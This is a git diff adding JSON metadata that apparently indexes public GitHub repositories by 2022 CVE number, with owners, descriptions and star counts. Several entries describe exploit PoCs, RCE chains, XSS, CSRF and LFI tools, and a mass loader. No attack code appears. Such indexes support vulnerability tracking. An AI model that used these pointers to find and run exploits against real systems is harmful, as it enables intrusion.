"id": 600600917, + "name": "Mandela-Classic", + "full_name": "BomberFish\/Mandela-Classic", + "owner": { + "login": "BomberFish", + "id": 87151697, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87151697?v=4", + "html_url": "https:\/\/github.com\/BomberFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BomberFish\/Mandela-Classic", + "description": "iOS customization app powered by CVE-2022-46689. No jailbreak required.", + "fork": false, + "created_at": "2023-02-12T01:33:45Z", + "updated_at": "2025-01-05T16:49:42Z", + "pushed_at": "2023-02-12T01:33:48Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 608056893, + "name": "MacDirtyCow", + "full_name": "enty8080\/MacDirtyCow", + "owner": { + "login": "enty8080", + "id": 54115104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54115104?v=4", + "html_url": "https:\/\/github.com\/enty8080", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/enty8080\/MacDirtyCow", + "description": "Example of CVE-2022-46689 aka MacDirtyCow.", + "fork": false, + "created_at": "2023-03-01T08:23:49Z", + "updated_at": "2024-12-03T09:45:25Z", + "pushed_at": "2023-03-01T08:25:46Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-46689", + "exploit", + "jailbreak", + "macdirtycow", + "macos" + ], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 628471421, + "name": "MDC", + "full_name": "tdquang266\/MDC", + "owner": { + "login": "tdquang266", + "id": 72800859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72800859?v=4", + "html_url": "https:\/\/github.com\/tdquang266", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tdquang266\/MDC", + "description": "I do some tweaking for iOS from 16.0 to 16.1.2 based on MacDirtyCow (CVE-2022-46689) exploit.", + "fork": false, + "created_at": "2023-04-16T03:33:38Z", + "updated_at": "2023-09-03T08:43:36Z", + "pushed_at": "2023-09-03T10:06:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 634201810, + "name": "sw1tch", + "full_name": "69camau\/sw1tch", + "owner": { + "login": "69camau", + "id": 131466913, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131466913?v=4", + "html_url": "https:\/\/github.com\/69camau", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/69camau\/sw1tch", + "description": "poc of CVE-2022-46689 written purely in swift", + "fork": false, + "created_at": "2023-04-29T11:21:40Z", + "updated_at": "2023-04-29T11:21:40Z", + "pushed_at": "2023-01-11T19:44:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46718.json b/2022/CVE-2022-46718.json new file mode 100644 index 0000000000..b1e4e92224 --- /dev/null +++ b/2022/CVE-2022-46718.json @@ -0,0 +1,33 @@ +[ + { + "id": 635000348, + "name": "cve-2022-46718-leaky-location", + "full_name": "biscuitehh\/cve-2022-46718-leaky-location", + "owner": { + "login": "biscuitehh", + "id": 507442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/507442?v=4", + "html_url": "https:\/\/github.com\/biscuitehh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/biscuitehh\/cve-2022-46718-leaky-location", + "description": "CVE-2022-46718: an app may be able to read sensitive location information.", + "fork": false, + "created_at": "2023-05-01T18:34:52Z", + "updated_at": "2024-07-11T07:02:13Z", + "pushed_at": "2023-05-01T18:48:34Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 26, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46836.json b/2022/CVE-2022-46836.json new file mode 100644 index 0000000000..5bbcd22d88 --- /dev/null +++ b/2022/CVE-2022-46836.json @@ -0,0 +1,33 @@ +[ + { + "id": 620031715, + "name": "CVE-2022-46836_remote_code_execution", + "full_name": "JacobEbben\/CVE-2022-46836_remote_code_execution", + "owner": { + "login": "JacobEbben", + "id": 112503338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4", + "html_url": "https:\/\/github.com\/JacobEbben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2022-46836_remote_code_execution", + "description": "Authenticated Remote Code Execution by abusing a single quote injection to write to an auth.php file imported by the NagVis component in Checkmk <= 2.1.0p10, Checkmk <= 2.0.0p27, and Checkmk <= 1.6.0p29", + "fork": false, + "created_at": "2023-03-27T22:30:21Z", + "updated_at": "2023-03-28T00:31:50Z", + "pushed_at": "2023-03-28T01:41:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47102.json b/2022/CVE-2022-47102.json new file mode 100644 index 0000000000..e817d8993d --- /dev/null +++ b/2022/CVE-2022-47102.json @@ -0,0 +1,33 @@ +[ + { + "id": 585255498, + "name": "CVE-2022-47102", + "full_name": "sudoninja-noob\/CVE-2022-47102", + "owner": { + "login": "sudoninja-noob", + "id": 18701598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4", + "html_url": "https:\/\/github.com\/sudoninja-noob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-47102", + "description": null, + "fork": false, + "created_at": "2023-01-04T17:56:09Z", + "updated_at": "2023-01-04T17:56:09Z", + "pushed_at": "2023-01-04T17:56:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47130.json b/2022/CVE-2022-47130.json new file mode 100644 index 0000000000..3cda157597 --- /dev/null +++ b/2022/CVE-2022-47130.json @@ -0,0 +1,33 @@ +[ + { + "id": 859926326, + "name": "CVE-2022-47130", + "full_name": "OpenXP-Research\/CVE-2022-47130", + "owner": { + "login": "OpenXP-Research", + "id": 124332420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124332420?v=4", + "html_url": "https:\/\/github.com\/OpenXP-Research", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OpenXP-Research\/CVE-2022-47130", + "description": "Academy LMS <= 5.10 CSRF", + "fork": false, + "created_at": "2024-09-19T14:14:14Z", + "updated_at": "2024-09-19T14:14:40Z", + "pushed_at": "2024-09-19T14:14:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47131.json b/2022/CVE-2022-47131.json new file mode 100644 index 0000000000..d4689bf385 --- /dev/null +++ b/2022/CVE-2022-47131.json @@ -0,0 +1,33 @@ +[ + { + "id": 859925470, + "name": "CVE-2022-47131", + "full_name": "OpenXP-Research\/CVE-2022-47131", + "owner": { + "login": "OpenXP-Research", + "id": 124332420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124332420?v=4", + "html_url": "https:\/\/github.com\/OpenXP-Research", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OpenXP-Research\/CVE-2022-47131", + "description": "Academy LMS <= 5.10 CSRF \/ XSS", + "fork": false, + "created_at": "2024-09-19T14:12:43Z", + "updated_at": "2024-09-19T14:13:09Z", + "pushed_at": "2024-09-19T14:13:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47132.json b/2022/CVE-2022-47132.json new file mode 100644 index 0000000000..21e90cee55 --- /dev/null +++ b/2022/CVE-2022-47132.json @@ -0,0 +1,33 @@ +[ + { + "id": 859924903, + "name": "CVE-2022-47132", + "full_name": "OpenXP-Research\/CVE-2022-47132", + "owner": { + "login": "OpenXP-Research", + "id": 124332420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124332420?v=4", + "html_url": "https:\/\/github.com\/OpenXP-Research", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OpenXP-Research\/CVE-2022-47132", + "description": "Academy LMS <= 5.10 CSRF", + "fork": false, + "created_at": "2024-09-19T14:11:42Z", + "updated_at": "2024-09-19T14:12:11Z", + "pushed_at": "2024-09-19T14:12:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47197.json b/2022/CVE-2022-47197.json new file mode 100644 index 0000000000..30f24d8981 --- /dev/null +++ b/2022/CVE-2022-47197.json @@ -0,0 +1,64 @@ +[ + { + "id": 786354822, + "name": "CVE-2022-47197-2", + "full_name": "miguelc49\/CVE-2022-47197-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2022-47197-2", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:39:39Z", + "updated_at": "2024-04-14T17:39:26Z", + "pushed_at": "2024-04-14T17:39:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786354836, + "name": "CVE-2022-47197-1", + "full_name": "miguelc49\/CVE-2022-47197-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2022-47197-1", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:39:42Z", + "updated_at": "2024-04-14T17:39:22Z", + "pushed_at": "2024-04-14T17:39:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47373.json b/2022/CVE-2022-47373.json new file mode 100644 index 0000000000..8c172b9891 --- /dev/null +++ b/2022/CVE-2022-47373.json @@ -0,0 +1,33 @@ +[ + { + "id": 602657363, + "name": "CVE-2022-47373", + "full_name": "Argonx21\/CVE-2022-47373", + "owner": { + "login": "Argonx21", + "id": 30073895, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30073895?v=4", + "html_url": "https:\/\/github.com\/Argonx21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Argonx21\/CVE-2022-47373", + "description": "Reflected Cross Site Scripting Vulnerability in PandoraFMS <= v766", + "fork": false, + "created_at": "2023-02-16T17:10:25Z", + "updated_at": "2023-02-16T17:10:25Z", + "pushed_at": "2023-10-15T15:07:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47529.json b/2022/CVE-2022-47529.json new file mode 100644 index 0000000000..bd9934f8a4 --- /dev/null +++ b/2022/CVE-2022-47529.json @@ -0,0 +1,33 @@ +[ + { + "id": 618631888, + "name": "CVE-2022-47529", + "full_name": "hyp3rlinx\/CVE-2022-47529", + "owner": { + "login": "hyp3rlinx", + "id": 12366009, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12366009?v=4", + "html_url": "https:\/\/github.com\/hyp3rlinx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hyp3rlinx\/CVE-2022-47529", + "description": "RSA NetWitness Platform EDR Agent \/ Incorrect Access Control - Code Execution", + "fork": false, + "created_at": "2023-03-24T22:50:26Z", + "updated_at": "2023-05-23T11:03:27Z", + "pushed_at": "2023-03-24T23:07:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47615.json b/2022/CVE-2022-47615.json new file mode 100644 index 0000000000..8a626ff0c5 --- /dev/null +++ b/2022/CVE-2022-47615.json @@ -0,0 +1,33 @@ +[ + { + "id": 680191554, + "name": "CVE-2022-47615", + "full_name": "RandomRobbieBF\/CVE-2022-47615", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2022-47615", + "description": "LearnPress Plugin < 4.2.0 - Unauthenticated LFI Description ", + "fork": false, + "created_at": "2023-08-18T15:04:36Z", + "updated_at": "2024-08-12T20:32:31Z", + "pushed_at": "2023-08-18T15:14:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47872.json b/2022/CVE-2022-47872.json new file mode 100644 index 0000000000..4cdddac68c --- /dev/null +++ b/2022/CVE-2022-47872.json @@ -0,0 +1,33 @@ +[ + { + "id": 595891677, + "name": "CVE-2022-47872", + "full_name": "Cedric1314\/CVE-2022-47872", + "owner": { + "login": "Cedric1314", + "id": 42855430, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42855430?v=4", + "html_url": "https:\/\/github.com\/Cedric1314", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cedric1314\/CVE-2022-47872", + "description": null, + "fork": false, + "created_at": "2023-02-01T02:34:19Z", + "updated_at": "2023-02-01T02:34:19Z", + "pushed_at": "2023-02-01T03:13:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47909.json b/2022/CVE-2022-47909.json new file mode 100644 index 0000000000..eba28d3e69 --- /dev/null +++ b/2022/CVE-2022-47909.json @@ -0,0 +1,33 @@ +[ + { + "id": 619371166, + "name": "CVE-2022-47909_unauth_arbitrary_file_deletion", + "full_name": "JacobEbben\/CVE-2022-47909_unauth_arbitrary_file_deletion", + "owner": { + "login": "JacobEbben", + "id": 112503338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4", + "html_url": "https:\/\/github.com\/JacobEbben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2022-47909_unauth_arbitrary_file_deletion", + "description": "Unauthenticated Arbitrary File Deletion by abusing Livestatus Query Language Injection in Checkmk <= 2.1.0p11, Checkmk <= 2.0.0p28, and all versions of Checkmk 1.6.0 (EOL)", + "fork": false, + "created_at": "2023-03-27T02:16:51Z", + "updated_at": "2023-03-27T09:18:20Z", + "pushed_at": "2023-03-27T14:28:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47952.json b/2022/CVE-2022-47952.json new file mode 100644 index 0000000000..815a041ce9 --- /dev/null +++ b/2022/CVE-2022-47952.json @@ -0,0 +1,33 @@ +[ + { + "id": 584002684, + "name": "CVE-2022-47952", + "full_name": "MaherAzzouzi\/CVE-2022-47952", + "owner": { + "login": "MaherAzzouzi", + "id": 62230190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62230190?v=4", + "html_url": "https:\/\/github.com\/MaherAzzouzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaherAzzouzi\/CVE-2022-47952", + "description": "LXC Information Disclosure vulnerability.", + "fork": false, + "created_at": "2022-12-31T21:24:46Z", + "updated_at": "2023-02-03T21:27:48Z", + "pushed_at": "2022-12-31T21:25:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47966.json b/2022/CVE-2022-47966.json new file mode 100644 index 0000000000..61cf31e0b1 --- /dev/null +++ b/2022/CVE-2022-47966.json @@ -0,0 +1,172 @@ +[ + { + "id": 590196501, + "name": "CVE-2022-47966", + "full_name": "horizon3ai\/CVE-2022-47966", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2022-47966", + "description": "POC for CVE-2022-47966 affecting multiple ManageEngine products", + "fork": false, + "created_at": "2023-01-17T21:26:28Z", + "updated_at": "2024-12-29T04:36:41Z", + "pushed_at": "2023-01-19T13:10:07Z", + "stargazers_count": 125, + "watchers_count": 125, + "has_discussions": false, + "forks_count": 32, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 32, + "watchers": 125, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 590861031, + "name": "PoC-for-ME-SAML-Vulnerability", + "full_name": "shameem-testing\/PoC-for-ME-SAML-Vulnerability", + "owner": { + "login": "shameem-testing", + "id": 83210904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83210904?v=4", + "html_url": "https:\/\/github.com\/shameem-testing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shameem-testing\/PoC-for-ME-SAML-Vulnerability", + "description": "PoC for cve-2022-47966", + "fork": false, + "created_at": "2023-01-19T11:41:05Z", + "updated_at": "2023-01-19T11:41:05Z", + "pushed_at": "2023-01-19T12:29:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 592261667, + "name": "CVE-2022-47966", + "full_name": "Inplex-sys\/CVE-2022-47966", + "owner": { + "login": "Inplex-sys", + "id": 69421356, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69421356?v=4", + "html_url": "https:\/\/github.com\/Inplex-sys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Inplex-sys\/CVE-2022-47966", + "description": "The manage engine mass loader for CVE-2022-47966", + "fork": false, + "created_at": "2023-01-23T10:45:23Z", + "updated_at": "2023-03-11T00:41:31Z", + "pushed_at": "2023-01-23T10:46:43Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "cve", + "exploit", + "loader", + "manageengone", + "rce", + "scanner" + ], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 592277196, + "name": "CVE-2022-47966_checker", + "full_name": "ACE-Responder\/CVE-2022-47966_checker", + "owner": { + "login": "ACE-Responder", + "id": 123371860, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123371860?v=4", + "html_url": "https:\/\/github.com\/ACE-Responder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ACE-Responder\/CVE-2022-47966_checker", + "description": "Run on your ManageEngine server", + "fork": false, + "created_at": "2023-01-23T11:33:29Z", + "updated_at": "2024-01-04T14:45:12Z", + "pushed_at": "2023-01-23T12:09:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 592376575, + "name": "CVE-2022-47966-Scan", + "full_name": "vonahisec\/CVE-2022-47966-Scan", + "owner": { + "login": "vonahisec", + "id": 31076758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31076758?v=4", + "html_url": "https:\/\/github.com\/vonahisec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vonahisec\/CVE-2022-47966-Scan", + "description": "Python scanner for CVE-2022-47966. Supports ~10 of the 24 affected products.", + "fork": false, + "created_at": "2023-01-23T15:49:10Z", + "updated_at": "2024-05-16T11:56:13Z", + "pushed_at": "2023-02-08T19:25:50Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "blue-team", + "pentesting", + "python", + "red-team", + "vulnerability", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 5, + "watchers": 26, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47986.json b/2022/CVE-2022-47986.json new file mode 100644 index 0000000000..17ad7d679f --- /dev/null +++ b/2022/CVE-2022-47986.json @@ -0,0 +1,110 @@ +[ + { + "id": 596890339, + "name": "CVE-2022-47986", + "full_name": "ohnonoyesyes\/CVE-2022-47986", + "owner": { + "login": "ohnonoyesyes", + "id": 93457304, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93457304?v=4", + "html_url": "https:\/\/github.com\/ohnonoyesyes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ohnonoyesyes\/CVE-2022-47986", + "description": "Aspera Faspex Pre Auth RCE", + "fork": false, + "created_at": "2023-02-03T06:32:13Z", + "updated_at": "2023-06-21T05:14:03Z", + "pushed_at": "2023-02-03T06:33:42Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 600046987, + "name": "CVE-2022-47986", + "full_name": "dhina016\/CVE-2022-47986", + "owner": { + "login": "dhina016", + "id": 46128375, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46128375?v=4", + "html_url": "https:\/\/github.com\/dhina016", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dhina016\/CVE-2022-47986", + "description": null, + "fork": false, + "created_at": "2023-02-10T13:16:42Z", + "updated_at": "2023-02-10T13:16:42Z", + "pushed_at": "2023-02-10T13:17:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 611950909, + "name": "CVE-2022-47986", + "full_name": "mauricelambert\/CVE-2022-47986", + "owner": { + "login": "mauricelambert", + "id": 50479118, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50479118?v=4", + "html_url": "https:\/\/github.com\/mauricelambert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mauricelambert\/CVE-2022-47986", + "description": "CVE-2022-47986: Python, Ruby, NMAP and Metasploit modules to exploit the vulnerability.", + "fork": false, + "created_at": "2023-03-09T22:03:48Z", + "updated_at": "2023-03-09T22:33:55Z", + "pushed_at": "2023-03-09T22:31:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "aspera", + "cve-2022-47986", + "deserialization", + "exploit", + "faspex", + "ibm", + "metasploit", + "nmap", + "poc", + "python3", + "rce", + "ruby", + "vulnerability", + "yaml" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-48150.json b/2022/CVE-2022-48150.json new file mode 100644 index 0000000000..02fe245652 --- /dev/null +++ b/2022/CVE-2022-48150.json @@ -0,0 +1,33 @@ +[ + { + "id": 624508549, + "name": "-CVE-2022-48150", + "full_name": "sahilop123\/-CVE-2022-48150", + "owner": { + "login": "sahilop123", + "id": 95895762, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95895762?v=4", + "html_url": "https:\/\/github.com\/sahilop123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sahilop123\/-CVE-2022-48150", + "description": "I Found the reflected xss vulnerability in shopware 5 .for more details check my poc video ", + "fork": false, + "created_at": "2023-04-06T16:14:42Z", + "updated_at": "2023-12-14T09:35:20Z", + "pushed_at": "2023-04-06T19:01:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-48194.json b/2022/CVE-2022-48194.json new file mode 100644 index 0000000000..04166d0ebc --- /dev/null +++ b/2022/CVE-2022-48194.json @@ -0,0 +1,33 @@ +[ + { + "id": 583289521, + "name": "internet-of-vulnerable-things", + "full_name": "otsmr\/internet-of-vulnerable-things", + "owner": { + "login": "otsmr", + "id": 48922451, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48922451?v=4", + "html_url": "https:\/\/github.com\/otsmr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/otsmr\/internet-of-vulnerable-things", + "description": "The results of my small term paper on the topic of the Internet of Vulnerable Things and the exploit for CVE-2022-48194.", + "fork": false, + "created_at": "2022-12-29T10:32:23Z", + "updated_at": "2024-09-10T15:03:19Z", + "pushed_at": "2023-01-20T23:38:40Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 15, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-48197.json b/2022/CVE-2022-48197.json new file mode 100644 index 0000000000..bd1f5b0249 --- /dev/null +++ b/2022/CVE-2022-48197.json @@ -0,0 +1,33 @@ +[ + { + "id": 584354205, + "name": "CVE-2022-48197", + "full_name": "ryan412\/CVE-2022-48197", + "owner": { + "login": "ryan412", + "id": 54446262, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54446262?v=4", + "html_url": "https:\/\/github.com\/ryan412", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ryan412\/CVE-2022-48197", + "description": null, + "fork": false, + "created_at": "2023-01-02T10:27:04Z", + "updated_at": "2023-01-02T10:27:04Z", + "pushed_at": "2023-01-02T10:31:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-48311.json b/2022/CVE-2022-48311.json new file mode 100644 index 0000000000..bbcb02dcfe --- /dev/null +++ 